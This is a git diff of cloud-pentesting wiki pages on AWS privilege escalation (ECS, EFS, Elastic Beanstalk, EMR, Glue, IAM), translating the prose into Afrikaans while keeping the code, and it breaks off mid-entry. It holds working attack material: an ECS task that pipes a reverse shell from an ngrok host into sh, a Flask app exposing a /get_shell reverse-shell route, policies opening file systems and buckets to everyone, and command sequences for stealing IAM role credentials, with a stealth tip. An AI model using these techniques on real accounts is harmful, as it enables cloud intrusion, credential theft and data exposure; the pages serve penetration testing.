@@ -206,30 +194,29 @@ aws-ec2-privesc.md ### `?ecs:RegisterContainerInstance` -TODO: Is it possible to register an instance from a different AWS account so tasks are run under machines controlled by the attacker?? +TODO: Is dit moontlik om 'n instansie van 'n ander AWS-rekening te registreer sodat take onder masjiene wat deur die aanvaller beheer word, uitgevoer word?? ### `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, `ecs:DescribeTaskSets` > [!NOTE] -> TODO: Test this - -An attacker with the permissions `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, and `ecs:DescribeTaskSets` can **create a malicious task set for an existing ECS service and update the primary task set**. This allows the attacker to **execute arbitrary code within the service**. +> TODO: Toets dit +'n Aanvaller met die toestemmings `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, en `ecs:DescribeTaskSets` kan **'n kwaadwillige taakstel vir 'n bestaande ECS-diens skep en die primĂȘre taakstel opdateer**. Dit stel die aanvaller in staat om **arbitraire kode binne die diens uit te voer**. ```bash bashCopy code# Register a task definition with a reverse shell echo '{ - "family": "malicious-task", - "containerDefinitions": [ - { - "name": "malicious-container", - "image": "alpine", - "command": [ - "sh", - "-c", - "apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh" - ] - } - ] +"family": "malicious-task", +"containerDefinitions": [ +{ +"name": "malicious-container", +"image": "alpine", +"command": [ +"sh", +"-c", +"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh" +] +} +] }' > malicious-task-definition.json aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json 
@@ -240,15 +227,10 @@ aws ecs create-task-set --cluster existing-cluster --service existing-service -- # Update the primary task set for the service aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id ``` +**PotensiĂ«le Impak**: Voer arbitrĂȘre kode uit in die betrokke diens, wat moontlik die funksionaliteit daarvan beĂŻnvloed of sensitiewe data uitvlek. -**Potential Impact**: Execute arbitrary code in the affected service, potentially impacting its functionality or exfiltrating sensitive data. - -## References +## Verwysings - [https://ruse.tech/blogs/ecs-attack-methods](https://ruse.tech/blogs/ecs-attack-methods) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md index 8a54b28d8..185f503ff 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md 
@@ -4,97 +4,83 @@ ## EFS -More **info about EFS** in: +Meer **inligting oor EFS** in: {{#ref}} ../aws-services/aws-efs-enum.md {{#endref}} -Remember that in order to mount an EFS you need to be in a subnetwork where the EFS is exposed and have access to it (security groups). Is this is happening, by default, you will always be able to mount it, however, if it's protected by IAM policies you need to have the extra permissions mentioned here to access it. +Onthou dat jy om 'n EFS te monteer, in 'n subnetwerk moet wees waar die EFS blootgestel is en toegang daartoe moet hĂȘ (veiligheidsgroepe). As dit gebeur, sal jy dit standaard altyd kan monteer, maar as dit deur IAM-beleide beskerm word, moet jy die ekstra toestemmings hĂȘ wat hier genoem word om toegang te verkry. ### `elasticfilesystem:DeleteFileSystemPolicy`|`elasticfilesystem:PutFileSystemPolicy` -With any of those permissions an attacker can **change the file system policy** to **give you access** to it, or to just **delete it** so the **default access** is granted. - -To delete the policy: +Met enige van daardie toestemmings kan 'n aanvaller die **lĂȘerstelselsbeleid** **verander** om jou **toegang** daartoe te gee, of om dit net te **verwyder** sodat die **standaardtoegang** toegestaan word. 
+Om die beleid te verwyder: ```bash aws efs delete-file-system-policy \ - --file-system-id +--file-system-id ``` - -To change it: - +Om dit te verander: ```json aws efs put-file-system-policy --file-system-id --policy file:///tmp/policy.json // Give everyone trying to mount it read, write and root access // policy.json: { - "Version": "2012-10-17", - "Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763", - "Statement": [ - { - "Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "elasticfilesystem:ClientRootAccess", - "elasticfilesystem:ClientWrite", - "elasticfilesystem:ClientMount" - ], - "Condition": { - "Bool": { - "elasticfilesystem:AccessedViaMountTarget": "true" - } - } - } - ] +"Version": "2012-10-17", +"Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763", +"Statement": [ +{ +"Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": [ +"elasticfilesystem:ClientRootAccess", +"elasticfilesystem:ClientWrite", +"elasticfilesystem:ClientMount" +], +"Condition": { +"Bool": { +"elasticfilesystem:AccessedViaMountTarget": "true" +} +} +} +] } ``` - ### `elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)` -With this permission an attacker will be able to **mount the EFS**. If the write permission is not given by default to everyone that can mount the EFS, he will have only **read access**. - +Met hierdie toestemming sal 'n aanvaller in staat wees om die **EFS te monteer**. As die skryftoestemming nie standaard aan almal wat die EFS kan monteer gegee word nie, sal hy slegs **lees toegang** hĂȘ. 
```bash sudo mkdir /efs sudo mount -t efs -o tls,iam :/ /efs/ ``` +Die ekstra regte `elasticfilesystem:ClientRootAccess` en `elasticfilesystem:ClientWrite` kan gebruik word om **te skryf** binne die lĂȘerstelsel nadat dit gemonteer is en om **toegang** tot daardie lĂȘerstelsel **as root** te verkry. -The extra permissions`elasticfilesystem:ClientRootAccess` and `elasticfilesystem:ClientWrite` can be used to **write** inside the filesystem after it's mounted and to **access** that file system **as root**. - -**Potential Impact:** Indirect privesc by locating sensitive information in the file system. +**PotensiĂ«le Impak:** Indirekte privesc deur sensitiewe inligting in die lĂȘerstelsel te lokaliseer. ### `elasticfilesystem:CreateMountTarget` -If you an attacker is inside a **subnetwork** where **no mount target** of the EFS exists. He could just **create one in his subnet** with this privilege: - +As jy 'n aanvaller is wat binne 'n **subnet** is waar **geen monteerdoel** van die EFS bestaan nie. Hy kan eenvoudig **een in sy subnet skep** met hierdie voorreg: ```bash # You need to indicate security groups that will grant the user access to port 2049 aws efs create-mount-target --file-system-id \ - --subnet-id \ - --security-groups +--subnet-id \ +--security-groups ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the file system. +**PotensiĂ«le Impak:** Indirekte privesc deur sensitiewe inligting in die lĂȘerstelsel te lokaliseer. 
### `elasticfilesystem:ModifyMountTargetSecurityGroups` -In a scenario where an attacker finds that the EFS has mount target in his subnetwork but **no security group is allowing the traffic**, he could just **change that modifying the selected security groups**: - +In 'n scenario waar 'n aanvaller ontdek dat die EFS 'n mount target in sy subnetwerk het, maar **geen sekuriteitsgroep die verkeer toelaat nie**, kan hy eenvoudig **dit verander deur die geselekteerde sekuriteitsgroepe aan te pas**: ```bash aws efs modify-mount-target-security-groups \ - --mount-target-id \ - --security-groups +--mount-target-id \ +--security-groups ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the file system. +**PotensiĂ«le Impak:** Indirekte privesc deur sensitiewe inligting in die lĂȘerstelsel te lokaliseer. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md index 613dd3a47..1eefa948d 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md 
@@ -4,19 +4,18 @@ ## Elastic Beanstalk -More **info about Elastic Beanstalk** in: +Meer **inligting oor Elastic Beanstalk** in: {{#ref}} ../aws-services/aws-elastic-beanstalk-enum.md {{#endref}} > [!WARNING] -> In order to perform sensitive actions in Beanstalk you will need to have a **lot of sensitive permissions in a lot of different services**. You can check for example the permissions given to **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`** +> Om sensitiewe aksies in Beanstalk uit te voer, sal jy **'n baie groot aantal sensitiewe toestemmings in 'n baie verskillende dienste** nodig hĂȘ. Jy kan byvoorbeeld die toestemmings nagaan wat gegee is aan **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`** -### `elasticbeanstalk:RebuildEnvironment`, S3 write permissions & many others - -With **write permissions over the S3 bucket** containing the **code** of the environment and permissions to **rebuild** the application (it's needed `elasticbeanstalk:RebuildEnvironment` and a few more related to `S3` , `EC2` and `Cloudformation`), you can **modify** the **code**, **rebuild** the app and the next time you access the app it will **execute your new code**, allowing the attacker to compromise the application and the IAM role credentials of it. +### `elasticbeanstalk:RebuildEnvironment`, S3 skryftoestemmings & baie ander +Met **skryftoestemmings oor die S3-bucket** wat die **kode** van die omgewing bevat en toestemmings om die toepassing te **herbou** (dit is nodig `elasticbeanstalk:RebuildEnvironment` en 'n paar meer wat verband hou met `S3`, `EC2` en `Cloudformation`), kan jy die **kode** **wysig**, die app **herbou** en die volgende keer wanneer jy toegang tot die app kry, sal dit **jou nuwe kode uitvoer**, wat die aanvaller in staat stel om die toepassing en die IAM-rol geloofsbriewe daarvan te kompromitteer. ```bash # Create folder mkdir elasticbeanstalk-eu-west-1-947247140022 
@@ -31,56 +30,42 @@ aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247 # Rebuild env aws elasticbeanstalk rebuild-environment --environment-name "env-name" ``` +### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, en meer... -### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, and more... - -The mentioned plus several **`S3`**, **`EC2`, `cloudformation`** ,**`autoscaling`** and **`elasticloadbalancing`** permissions are the necessary to create a raw Elastic Beanstalk scenario from scratch. - -- Create an AWS Elastic Beanstalk application: +Die genoemde plus verskeie **`S3`**, **`EC2`, `cloudformation`**, **`autoscaling`** en **`elasticloadbalancing`** toestemmings is nodig om 'n rou Elastic Beanstalk-scenario van nuuts af te skep. +- Skep 'n AWS Elastic Beanstalk-toepassing: ```bash aws elasticbeanstalk create-application --application-name MyApp ``` - -- Create an AWS Elastic Beanstalk environment ([**supported platforms**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)): - +- Skep 'n AWS Elastic Beanstalk omgewing ([**ondersteunde platforms**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)): ```bash aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role ``` +As 'n omgewing reeds geskep is en jy **nie 'n nuwe een wil skep nie**, kan jy eenvoudig die bestaande een **opdateer**. 
-If an environment is already created and you **don't want to create a new one**, you could just **update** the existent one. - -- Package your application code and dependencies into a ZIP file: - +- Pakket jou toepassingskode en afhanklikhede in 'n ZIP-lĂȘer: ```python zip -r MyApp.zip . ``` - -- Upload the ZIP file to an S3 bucket: - +- Laai die ZIP-lĂȘer na 'n S3-bucket op: ```python aws s3 cp MyApp.zip s3://elasticbeanstalk--/MyApp.zip ``` - -- Create an AWS Elastic Beanstalk application version: - +- Skep 'n AWS Elastic Beanstalk-toepassing weergawe: ```css aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk--",S3Key="MyApp.zip" ``` - -- Deploy the application version to your AWS Elastic Beanstalk environment: - +- Ontplooi die toepassingsweergawe na jou AWS Elastic Beanstalk-omgewing: ```bash aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0 ``` - ### `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `cloudformation:GetTemplate`, `cloudformation:DescribeStackResources`, `cloudformation:DescribeStackResource`, `autoscaling:DescribeAutoScalingGroups`, `autoscaling:SuspendProcesses`, `autoscaling:SuspendProcesses` -First of all you need to create a **legit Beanstalk environment** with the **code** you would like to run in the **victim** following the **previous steps**. Potentially a simple **zip** containing these **2 files**: +Eerstens moet jy 'n **legitieme Beanstalk-omgewing** skep met die **kode** wat jy in die **slagoffer** wil uitvoer volgens die **vorige stappe**. Potensieel 'n eenvoudige **zip** wat hierdie **2 lĂȘers** bevat: {{#tabs }} {{#tab name="application.py" }} - ```python from flask import Flask, request, jsonify import subprocess,os, socket 
@@ -89,34 +74,32 @@ application = Flask(__name__) @application.errorhandler(404) def page_not_found(e): - return jsonify('404') +return jsonify('404') @application.route("/") def index(): - return jsonify('Welcome!') +return jsonify('Welcome!') @application.route("/get_shell") def search(): - host=request.args.get('host') - port=request.args.get('port') - if host and port: - s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) - s.connect((host,int(port))) - os.dup2(s.fileno(),0) - os.dup2(s.fileno(),1) - os.dup2(s.fileno(),2) - p=subprocess.call(["/bin/sh","-i"]) - return jsonify('done') +host=request.args.get('host') +port=request.args.get('port') +if host and port: +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +s.connect((host,int(port))) +os.dup2(s.fileno(),0) +os.dup2(s.fileno(),1) +os.dup2(s.fileno(),2) +p=subprocess.call(["/bin/sh","-i"]) +return jsonify('done') if __name__=="__main__": - application.run() +application.run() ``` - {{#endtab }} {{#tab name="requirements.txt" }} - ``` click==7.1.2 Flask==1.1.2 
@@ -125,44 +108,42 @@ Jinja2==2.11.3 MarkupSafe==1.1.1 Werkzeug==1.0.1 ``` - {{#endtab }} {{#endtabs }} -Once you have **your own Beanstalk env running** your rev shell, it's time to **migrate** it to the **victims** env. To so so you need to **update the Bucket Policy** of your beanstalk S3 bucket so the **victim can access it** (Note that this will **open** the Bucket to **EVERYONE**): - +Sodra jy **jou eie Beanstalk omgewing** met jou rev shell aan die gang het, is dit tyd om dit te **migreer** na die **slagoffer** se omgewing. Om dit te doen, moet jy die **Bucket-beleid** van jou beanstalk S3-bucket **opdateer** sodat die **slagoffer toegang kan hĂȘ** (Let daarop dat dit die Bucket vir **ELKEEN** sal **oopmaak**): ```json { - "Version": "2008-10-17", - "Statement": [ - { - "Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "s3:ListBucket", - "s3:ListBucketVersions", - "s3:GetObject", - "s3:GetObjectVersion", - "s3:*" - ], - "Resource": [ - "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022", - "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*" - ] - }, - { - "Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b", - "Effect": "Deny", - "Principal": { - "AWS": "*" - }, - "Action": "s3:DeleteBucket", - "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022" - } - ] +"Version": "2008-10-17", +"Statement": [ +{ +"Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": [ +"s3:ListBucket", +"s3:ListBucketVersions", +"s3:GetObject", +"s3:GetObjectVersion", +"s3:*" +], +"Resource": [ +"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022", +"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*" +] +}, +{ +"Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b", +"Effect": "Deny", +"Principal": { +"AWS": "*" +}, +"Action": "s3:DeleteBucket", +"Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022" +} +] } ``` 
@@ -181,9 +162,4 @@ Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBe The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections. ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md index 0025abe52..bd917174b 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md @@ -4,7 +4,7 @@ ## EMR -More **info about EMR** in: +Meer **inligting oor EMR** in: {{#ref}} ../aws-services/aws-emr-enum.md 
@@ -12,57 +12,51 @@ More **info about EMR** in: ### `iam:PassRole`, `elasticmapreduce:RunJobFlow` -An attacker with these permissions can **run a new EMR cluster attaching EC2 roles** and try to steal its credentials.\ -Note that in order to do this you would need to **know some ssh priv key imported in the account** or to import one, and be able to **open port 22 in the master node** (you might be able to do this with the attributes `EmrManagedMasterSecurityGroup` and/or `ServiceAccessSecurityGroup` inside `--ec2-attributes`). - +'n Aanvaller met hierdie toestemmings kan **'n nuwe EMR-kluster uitvoer wat EC2-rolle aanheg** en probeer om sy akrediteer te steel.\ +Let daarop dat jy om dit te doen, **'n ssh priv sleutel wat in die rekening ingevoer is, moet ken** of een moet invoer, en in staat moet wees om **poort 22 in die meesterknoop te open** (jy mag in staat wees om dit te doen met die eienskappe `EmrManagedMasterSecurityGroup` en/of `ServiceAccessSecurityGroup` binne `--ec2-attributes`). 
```bash # Import EC2 ssh key (you will need extra permissions for this) ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N "" chmod 400 /tmp/sshkey base64 /tmp/sshkey.pub > /tmp/pub.key aws ec2 import-key-pair \ - --key-name "privesc" \ - --public-key-material file:///tmp/pub.key +--key-name "privesc" \ +--public-key-material file:///tmp/pub.key aws emr create-cluster \ - --release-label emr-5.15.0 \ - --instance-type m4.large \ - --instance-count 1 \ - --service-role EMR_DefaultRole \ - --ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc +--release-label emr-5.15.0 \ +--instance-type m4.large \ +--instance-count 1 \ +--service-role EMR_DefaultRole \ +--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc # Wait 1min and connect via ssh to an EC2 instance of the cluster) aws emr describe-cluster --cluster-id # In MasterPublicDnsName you can find the DNS to connect to the master instance ## You cna also get this info listing EC2 instances ``` +Let op hoe 'n **EMR rol** gespesifiseer word in `--service-role` en 'n **ec2 rol** gespesifiseer word in `--ec2-attributes` binne `InstanceProfile`. Hierdie tegniek laat egter net toe om die EC2 rol geloofsbriewe te steel (soos jy via ssh sal aansluit) maar nie die EMR IAM Rol nie. -Note how an **EMR role** is specified in `--service-role` and a **ec2 role** is specified in `--ec2-attributes` inside `InstanceProfile`. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role. - -**Potential Impact:** Privesc to the EC2 service role specified. +**PotensiĂ«le Impak:** Privesc na die EC2 diensrol gespesifiseer. ### `elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole` -With these permissions an attacker can go to the **AWS console**, create a Notebook and access it to steal the IAM Role. 
+Met hierdie toestemmings kan 'n aanvaller na die **AWS konsole** gaan, 'n Notebook skep en dit toegang om die IAM Rol te steel. > [!CAUTION] -> Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related. +> Selfs as jy 'n IAM rol aan die notaboekinstansie heg, het ek in my toetse opgemerk dat ek in staat was om AWS bestuurde geloofsbriewe te steel en nie geloofsbriewe wat met die IAM rol verband hou nie. -**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile +**PotensiĂ«le Impak:** Privesc na AWS bestuurde rol arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile ### `elasticmapreduce:OpenEditorInConsole` -Just with this permission an attacker will be able to access the **Jupyter Notebook and steal the IAM role** associated to it.\ -The URL of the notebook is `https://.emrnotebooks-prod.eu-west-1.amazonaws.com//lab/` +Net met hierdie toestemming sal 'n aanvaller in staat wees om toegang te verkry tot die **Jupyter Notebook en die IAM rol** wat daaraan gekoppel is.\ +Die URL van die notaboek is `https://.emrnotebooks-prod.eu-west-1.amazonaws.com//lab/` > [!CAUTION] -> Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related +> Selfs as jy 'n IAM rol aan die notaboekinstansie heg, het ek in my toetse opgemerk dat ek in staat was om AWS bestuurde geloofsbriewe te steel en nie geloofsbriewe wat met die IAM rol verband hou nie. -**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile +**PotensiĂ«le Impak:** Privesc na AWS bestuurde rol arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile {{#include ../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md index b40cdf413..0501ebde3 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md @@ -4,19 +4,13 @@ ### `gamelift:RequestUploadCredentials` -With this permission an attacker can retrieve a **fresh set of credentials for use when uploading** a new set of game build files to Amazon GameLift's Amazon S3. It'll return **S3 upload credentials**. - +Met hierdie toestemming kan 'n aanvaller 'n **nuwe stel van geloofsbriewe verkry vir gebruik wanneer hulle** 'n nuwe stel speletjie bou lĂȘers na Amazon GameLift se Amazon S3 oplaai. Dit sal **S3 oplaai geloofsbriewe** teruggee. ```bash aws gamelift request-upload-credentials \ - --build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111 +--build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111 ``` - -## References +## Verwysings - [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md index 049d3b273..2f7c89ee5 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md 
@@ -6,15 +6,14 @@ ### `iam:PassRole`, `glue:CreateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`) -Users with these permissions can **set up a new AWS Glue development endpoint**, **assigning an existing service role assumable by Glue** with specific permissions to this endpoint. - -After the setup, the **attacker can SSH into the endpoint's instance**, and steal the IAM credentials of the assigned role: +Gebruikers met hierdie toestemmings kan **'n nuwe AWS Glue ontwikkelingspunt opstel**, **'n bestaande diensrol wat deur Glue aanvaarbaar is, aan hierdie punt toewys** met spesifieke toestemmings. +Na die opstelling kan die **aanvaller SSH in die punt se instansie**, en die IAM-akkrediteer van die toegewyde rol steel: ```bash # Create endpoint aws glue create-dev-endpoint --endpoint-name \ - --role-arn \ - --public-key file:///ssh/key.pub +--role-arn \ +--public-key file:///ssh/key.pub # Get the public address of the instance ## You could also use get-dev-endpoints 
@@ -23,19 +22,17 @@ aws glue get-dev-endpoint --endpoint-name privesctest # SSH with the glue user ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com ``` +Vir stealth-doeleindes word dit aanbeveel om die IAM-akkrediteerlinge van binne die Glue virtuele masjien te gebruik. -For stealth purpose, it's recommended to use the IAM credentials from inside the Glue virtual machine. - -**Potential Impact:** Privesc to the glue service role specified. +**PotensiĂ«le Impak:** Privesc na die spesifieke glue diensrol. ### `glue:UpdateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`) -Users with this permission can **alter an existing Glue development** endpoint's SSH key, **enabling SSH access to it**. This allows the attacker to execute commands with the privileges of the endpoint's attached role: - +Gebruikers met hierdie toestemming kan **'n bestaande Glue ontwikkeling** eindpunt se SSH-sleutel **verander, wat SSH-toegang tot dit moontlik maak**. Dit stel die aanvaller in staat om opdragte uit te voer met die voorregte van die eindpunt se aangehegte rol: ```bash # Change public key to connect aws glue --endpoint-name target_endpoint \ - --public-key file:///ssh/key.pub +--public-key file:///ssh/key.pub # Get the public address of the instance ## You could also use get-dev-endpoints 
@@ -44,13 +41,11 @@ aws glue get-dev-endpoint --endpoint-name privesctest # SSH with the glue user ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com ``` - -**Potential Impact:** Privesc to the glue service role used. +**PotensiĂ«le Impak:** Privesc na die glue diensrol wat gebruik word. ### `iam:PassRole`, (`glue:CreateJob` | `glue:UpdateJob`), (`glue:StartJobRun` | `glue:CreateTrigger`) -Users with **`iam:PassRole`** combined with either **`glue:CreateJob` or `glue:UpdateJob`**, and either **`glue:StartJobRun` or `glue:CreateTrigger`** can **create or update an AWS Glue job**, attaching any **Glue service account**, and initiate the job's execution. The job's capabilities include running arbitrary Python code, which can be exploited to establish a reverse shell. This reverse shell can then be utilized to exfiltrate the **IAM credential**s of the role attached to the Glue job, leading to potential unauthorized access or actions based on the permissions of that role: - +Gebruikers met **`iam:PassRole`** gekombineer met ofwel **`glue:CreateJob of `glue:UpdateJob`**, en ofwel **`glue:StartJobRun` of `glue:CreateTrigger`** kan **'n AWS Glue taak skep of opdateer**, enige **Glue diensrekening** aanheg, en die taak se uitvoering inisieer. Die taak se vermoĂ«ns sluit die uitvoering van arbitrĂȘre Python kode in, wat uitgebuit kan word om 'n omgekeerde shell te vestig. Hierdie omgekeerde shell kan dan gebruik word om die **IAM geloofsbriewe** van die rol wat aan die Glue taak geheg is, te eksfiltreer, wat kan lei tot potensiĂ«le ongeoorloofde toegang of aksies gebaseer op die toestemmings van daardie rol: ```bash # Content of the python script saved in s3: #import socket,subprocess,os 
@@ -65,32 +60,27 @@ Users with **`iam:PassRole`** combined with either **`glue:CreateJob` or `glue:U # A Glue role with admin access was created aws glue create-job \ - --name privesctest \ - --role arn:aws:iam::93424712358:role/GlueAdmin \ - --command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}' +--name privesctest \ +--role arn:aws:iam::93424712358:role/GlueAdmin \ +--command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}' # You can directly start the job aws glue start-job-run --job-name privesctest # Or you can create a trigger to start it aws glue create-trigger --name triggerprivesc --type SCHEDULED \ - --actions '[{"JobName": "privesctest"}]' --start-on-creation \ - --schedule "0/5 * * * * *" #Every 5mins, feel free to change +--actions '[{"JobName": "privesctest"}]' --start-on-creation \ +--schedule "0/5 * * * * *" #Every 5mins, feel free to change ``` - -**Potential Impact:** Privesc to the glue service role specified. +**PotensiĂ«le Impak:** Privesc na die glue diensrol gespesifiseer. ### `glue:UpdateJob` -Just with the update permission an attacked could steal the IAM Credentials of the already attached role. +Net met die opdatering toestemming kan 'n aanvaller die IAM Kredensiale van die reeds aangehegte rol steel. -**Potential Impact:** Privesc to the glue service role attached. +**PotensiĂ«le Impak:** Privesc na die glue diensrol aangeheg. -## References +## Verwysings - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md index 7807f6152..9ed078a96 100644 
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md @@ -4,7 +4,7 @@ ## IAM -For more info about IAM check: +Vir meer inligting oor IAM, kyk: {{#ref}} ../aws-services/aws-iam-enum.md 
@@ -12,228 +12,189 @@ For more info about IAM check: ### **`iam:CreatePolicyVersion`** -Grants the ability to create a new IAM policy version, bypassing the need for `iam:SetDefaultPolicyVersion` permission by using the `--set-as-default` flag. This enables defining custom permissions. +Gee die vermoĂ« om 'n nuwe IAM-beleid weergawe te skep, wat die behoefte aan `iam:SetDefaultPolicyVersion` toestemming omseil deur die `--set-as-default` vlag te gebruik. Dit stel in staat om pasgemaakte toestemmings te definieer. **Exploit Command:** - ```bash aws iam create-policy-version --policy-arn \ - --policy-document file:///path/to/administrator/policy.json --set-as-default +--policy-document file:///path/to/administrator/policy.json --set-as-default ``` - -**Impact:** Directly escalates privileges by allowing any action on any resource. +**Impak:** Verhoog direk die voorregte deur enige aksie op enige hulpbron toe te laat. ### **`iam:SetDefaultPolicyVersion`** -Allows changing the default version of an IAM policy to another existing version, potentially escalating privileges if the new version has more permissions. - -**Bash Command:** +Laat die verandering van die standaardweergawe van 'n IAM-beleid na 'n ander bestaande weergawe toe, wat moontlik voorregte kan verhoog as die nuwe weergawe meer toestemmings het. +**Bash Opdrag:** ```bash aws iam set-default-policy-version --policy-arn --version-id v2 ``` - -**Impact:** 